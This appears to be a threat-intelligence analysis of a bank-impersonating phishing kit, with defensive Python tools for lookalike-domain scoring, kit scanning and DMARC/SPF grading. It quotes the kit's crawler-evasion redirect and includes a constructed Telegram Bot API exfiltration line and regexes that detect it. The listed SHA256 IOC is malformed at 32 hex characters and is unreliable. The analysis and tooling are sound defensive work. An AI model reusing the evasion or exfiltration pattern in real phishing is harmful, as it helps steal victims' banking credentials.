Introduction

Business Email Compromise (BEC) attacks cost organizations billions annually. In this analysis, we dissect a live phishing kit targeting financial services firms in North America, examining the attacker infrastructure, evasion techniques, and indicators of compromise.

Initial Discovery

The kit was discovered via passive DNS monitoring — a newly registered domain mimicking a major Canadian bank triggered our detection pipeline. The phishing page achieved a 94% visual similarity score against the legitimate site.
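The passive-DNS check that fires on a registration like this is easy to sketch. The following is an added example written for this write-up, not code from the original analysis or its detection pipeline: it scores newly observed domains against a list of protected brand labels using exact, embedded and near-miss (edit distance) matches plus the "secure/login" decoration words that lookalike hostnames tend to carry. The brand names, allow-list, sample feed lines and thresholds are all constructed; the 94% figure in the text is a page-rendering similarity score, which this domain-name check does not attempt to reproduce.

```python
# Added example, not part of the original analysis: a lookalike-domain
# check of the kind a passive-DNS pipeline runs on newly observed names.
# Brand names, allow-list, feed lines and thresholds are constructed here.
import re

# Registrable labels of protected brands (constructed; not the bank in the write-up)
PROTECTED_BRANDS = ("legitbank", "northbank")
# The brands' own registrable domains, which must never alert
ALLOWLIST = {"legitbank.com", "northbank.ca"}
# Decoration words typical of credential-phishing hostnames (weak signal)
DECORATIONS = {"secure", "login", "verify", "update", "account", "signin"}
ALERT_THRESHOLD = 0.8

def refang(domain: str) -> str:
    """Turn defanged notation such as 'example[.]com' back into a real name."""
    return domain.strip().lower().replace("[.]", ".").replace("(.)", ".")

def registrable(domain: str) -> str:
    """Return 'label.tld' for a name, e.g. 'legitbank.com' for 'www.legitbank.com'.
    A public-suffix list is needed for multi-part TLDs; kept simple here."""
    parts = refang(domain).strip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else parts[0]

def levenshtein(a: str, b: str) -> int:
    """Classic edit distance; written for readability rather than speed."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def score_domain(domain: str) -> dict:
    """Score one domain against the brand list and return the evidence with a verdict."""
    reg = registrable(domain)
    if reg in ALLOWLIST:
        return {"domain": reg, "score": 0.0, "verdict": "allowlisted", "reasons": []}
    label = reg.split(".")[0]
    tokens = [t for t in re.split(r"[-_]", label) if t]
    squashed = re.sub(r"[^a-z0-9]", "", label)
    score, reasons = 0.0, []
    for brand in PROTECTED_BRANDS:
        if brand in tokens:                      # strongest signal: the brand as a whole token
            score = max(score, 1.0)
            reasons.append(f"exact brand token '{brand}'")
            continue
        if brand in squashed:                    # brand glued to other words, e.g. legitbanksecure
            score = max(score, 0.9)
            reasons.append(f"brand '{brand}' embedded in label")
            continue
        for tok in tokens:                       # typo / homoglyph variants
            d = levenshtein(tok, brand)
            if len(tok) >= 5 and d <= 2:
                score = max(score, 0.8)
                reasons.append(f"token '{tok}' is {d} edit(s) from '{brand}'")
    deco = [t for t in tokens if t in DECORATIONS]
    if deco and score > 0:                       # decorations only matter next to a brand hit
        score += 0.1 * len(deco)
        reasons.append("decoration tokens: " + ", ".join(deco))
    verdict = "alert" if score >= ALERT_THRESHOLD else "clear"
    return {"domain": reg, "score": round(score, 2), "verdict": verdict, "reasons": reasons}

# Constructed sample of newly observed names, one defanged as in IOC feeds
NEW_DOMAINS = [
    "legitbank-secure-login[.]com",
    "legltbank.com",          # homoglyph: l for i
    "www.legitbank.com",      # the brand itself
    "weatherreport.com",
]

def triage(domains=NEW_DOMAINS) -> list:
    """Return only the alerts, highest score first."""
    hits = [score_domain(d) for d in domains]
    return sorted((h for h in hits if h["verdict"] == "alert"), key=lambda h: -h["score"])

if __name__ == "__main__":
    for hit in triage():
        print(hit["domain"], hit["score"], "; ".join(hit["reasons"]))
```

In a real pipeline the brand list would be the organisation's own registrable domains, the allow-list would include partner and CDN names, and alerts would feed a takedown or blocklist workflow rather than stdout.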

Infrastructure Analysis

The attacker used a layered infrastructure:

  • Cloudflare CDN for IP obfuscation
  • Bulletproof hosting in Eastern Europe
  • Telegram bot for real-time credential exfiltration
  • Dynamic DNS to rotate C2 endpoints

Evasion Techniques

The kit employed several anti-analysis measures:

// Bot detection logic found in kit: crawlers, scanners and headless
// browsers are bounced to the real bank so they never see the harvesting page
if (/bot|crawler|spider|headless/i.test(navigator.userAgent)) {
  window.location.href = "https://legitbank.com";
}

Additionally, the kit checked for VPN/proxy IP ranges and redirected analysts away from the credential harvesting page.

Credential Exfiltration

Captured credentials were POSTed in real time to a Telegram bot via the Bot API. The attacker received an instant notification for each victim, allowing immediate account takeover before the victim realized they had been compromised.
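Both of the behaviours above (the user-agent bounce in the Evasion Techniques section and the Telegram Bot API exfiltration described here) leave fixed strings in the kit's JavaScript, so a triage pass over a captured kit can flag them without executing anything. The following is an added example written for this write-up, not code recovered from the kit or from the original analysis: it runs a small rule set over each source line, masks the secret half of any embedded bot token before recording evidence, and separately extracts the numeric bot ids for an IOC list. The sample source, the token and the rule names are constructed; the token shape (numeric id, colon, 35-character secret) is the commonly documented Telegram format.

```python
# Added example, not from the original write-up: a static triage pass over
# a captured kit's JavaScript that flags the evasion and exfiltration
# behaviours the analysis describes. The sample source and token are constructed.
import re

# Constructed kit fragment modelled on the quoted bot check; the token is fake
KIT_SAMPLE = """\
// constructed sample, modelled on the bot check quoted in the write-up
if (/bot|crawler|spider|headless/i.test(navigator.userAgent)) {
  window.location.href = "https://legitbank.example";
}
fetch("https://api.telegram.org/bot1234567890:AAFconstructedTOKENforDEMOonly00000/sendMessage", {method: "POST"});
"""

# Typical Telegram bot token shape: numeric bot id, colon, 35-character secret
TOKEN_RE = re.compile(r"(?<![0-9])(\d{8,10}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")

# Each rule: name, description, and a predicate over one source line
RULES = [
    ("ua_bot_check", "branches on a bot/crawler/headless user-agent test",
     lambda l: re.search(r"navigator\.userAgent", l) and
               re.search(r"/[^/]*(bot|crawler|spider|headless)[^/]*/i", l)),
    ("redirect_to_brand", "hard-coded redirect to an external site (analyst bounce)",
     lambda l: re.search(r"location(?:\.href)?\s*=\s*['\"]https?://", l)),
    ("telegram_bot_api", "talks to the Telegram Bot API",
     lambda l: re.search(r"api\.telegram\.org/bot", l)),
    ("telegram_token", "embeds what looks like a Telegram bot token",
     lambda l: TOKEN_RE.search(l)),
]

def mask_tokens(line: str) -> str:
    """Keep a prefix of the bot id for correlation but never the secret part."""
    return TOKEN_RE.sub(lambda m: m.group(1)[:4] + "****:[redacted]", line)

def scan_kit(source: str) -> list:
    """Return one finding per (line, rule) match; evidence is masked."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, desc, pred in RULES:
            if pred(line):
                findings.append({"rule": name, "line": lineno, "description": desc,
                                 "evidence": mask_tokens(line.strip())})
    return findings

def extract_bot_ids(source: str) -> list:
    """Bot ids (never secrets) to hand to an abuse report or IOC list."""
    return sorted({m.group(1) for m in TOKEN_RE.finditer(source)})

if __name__ == "__main__":
    for f in scan_kit(KIT_SAMPLE):
        print(f"line {f['line']:>3}  {f['rule']:<18} {f['evidence']}")
    print("bot ids:", extract_bot_ids(KIT_SAMPLE))
```

Masking matters because triage output ends up in tickets and shared reports; the bot id is enough to report the bot to Telegram and to pivot across kits, while the secret would let anyone who reads the report impersonate the bot.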

IOCs

Domain: legitimatebank-secure-login[.]com
IP: 185.220.xxx.xxx
Telegram Bot ID: 5xxxxxxx:AAF...
SHA256 (kit.zip): a3f8c2e1d4b7f0e9c6a2b5d8f1e4c7a0

Mitigation

Organizations should enforce DMARC, DKIM and SPF, deploy anti-phishing email gateways, and conduct regular user awareness training that focuses on URL verification techniques.
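"Enforcement" is the operative word: a DMARC record with p=none or an SPF record ending in +all is published but protects nobody. The checker below is an added example written for this write-up, not code from the original article; it grades DMARC and SPF TXT records, placing a weak record beside a corrected one, and applies the RFC 7208 limit of ten DNS-querying SPF terms. All records are constructed, and the example works on record strings you already hold (for instance from a dig lookup) rather than doing DNS itself.

```python
# Added example, not part of the original article: grade DMARC and SPF TXT
# records so an administrator can see which "enforcement" settings are
# actually in place. All records below are constructed.
import re

# RFC 7208 caps DNS-querying SPF terms at 10 per evaluation
SPF_LOOKUP_TERMS = ("include", "a", "mx", "ptr", "exists", "redirect")

def parse_dmarc(record: str) -> dict:
    """Split 'v=DMARC1; p=reject; rua=mailto:...' into a tag dictionary."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags

def assess_dmarc(record: str) -> dict:
    """Return {'level': 'enforced'|'partial'|'monitor'|'invalid', 'issues': [...]}."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return {"level": "invalid", "issues": ["missing or wrong v=DMARC1 tag"]}
    policy = tags.get("p", "").lower()
    if policy not in ("none", "quarantine", "reject"):
        return {"level": "invalid", "issues": [f"unknown p= value '{policy}'"]}
    pct = int(tags.get("pct", "100"))
    gaps, warnings = [], []           # gaps lower the level; warnings do not
    if policy == "none":
        gaps.append("p=none: failures are reported, never acted on")
    if policy != "none" and pct < 100:
        gaps.append(f"pct={pct}: only part of failing mail is subject to p={policy}")
    if tags.get("sp", policy).lower() == "none" and policy != "none":
        gaps.append("sp=none leaves subdomains unprotected")
    if policy == "quarantine":
        warnings.append("p=quarantine: move to p=reject once reports show no legitimate failures")
    if "rua" not in tags:
        warnings.append("no rua=: you will never see aggregate reports")
    level = "monitor" if policy == "none" else ("partial" if gaps else "enforced")
    return {"level": level, "issues": gaps + warnings}

def assess_spf(record: str) -> dict:
    """Return {'level': 'enforced'|'softfail'|'weak'|'broken'|'invalid', 'issues', 'lookups'}."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return {"level": "invalid", "issues": ["missing v=spf1"], "lookups": 0}
    issues, lookups, all_qualifier = [], 0, None
    for term in terms[1:]:
        t = term.lower()
        qual, body = (t[0], t[1:]) if t[0] in "+-~?" else ("+", t)
        name = re.split(r"[:/=]", body, 1)[0]   # 'include:x' -> include, 'mx/24' -> mx
        if name in SPF_LOOKUP_TERMS:
            lookups += 1
        if name == "all":
            all_qualifier = qual
    if lookups > 10:
        issues.append(f"{lookups} DNS-querying terms exceed the RFC 7208 limit of 10 (permerror)")
    if all_qualifier is None:
        issues.append("no 'all' mechanism: unlisted senders default to neutral")
        level = "weak"
    elif all_qualifier == "+":
        issues.append("+all authorises every sender on the internet")
        level = "broken"
    elif all_qualifier == "?":
        issues.append("?all is neutral: SPF says nothing about unlisted senders")
        level = "weak"
    elif all_qualifier == "~":
        issues.append("~all softfail: fine under DMARC, but receivers rarely reject on it alone")
        level = "softfail"
    else:
        level = "enforced"
    return {"level": level, "issues": issues, "lookups": lookups}

# Constructed records: the weak setting beside the corrected one
WEAK_DMARC = "v=DMARC1; p=none"
STRONG_DMARC = "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:dmarc@example.com; adkim=s; aspf=s"
WEAK_SPF = "v=spf1 include:_spf.example.com +all"
STRONG_SPF = "v=spf1 ip4:192.0.2.0/24 include:_spf.example.com -all"

if __name__ == "__main__":
    for label, rec, fn in (("weak DMARC", WEAK_DMARC, assess_dmarc), ("strong DMARC", STRONG_DMARC, assess_dmarc),
                           ("weak SPF", WEAK_SPF, assess_spf), ("strong SPF", STRONG_SPF, assess_spf)):
        result = fn(rec)
        print(f"{label:<13} {result['level']:<9} {'; '.join(result['issues']) or 'ok'}")
```

The level field is what to track over time: a domain should move from monitor to partial to enforced as the aggregate reports are cleaned up, and DKIM alignment (adkim=s) should be added only once every legitimate sender is signing.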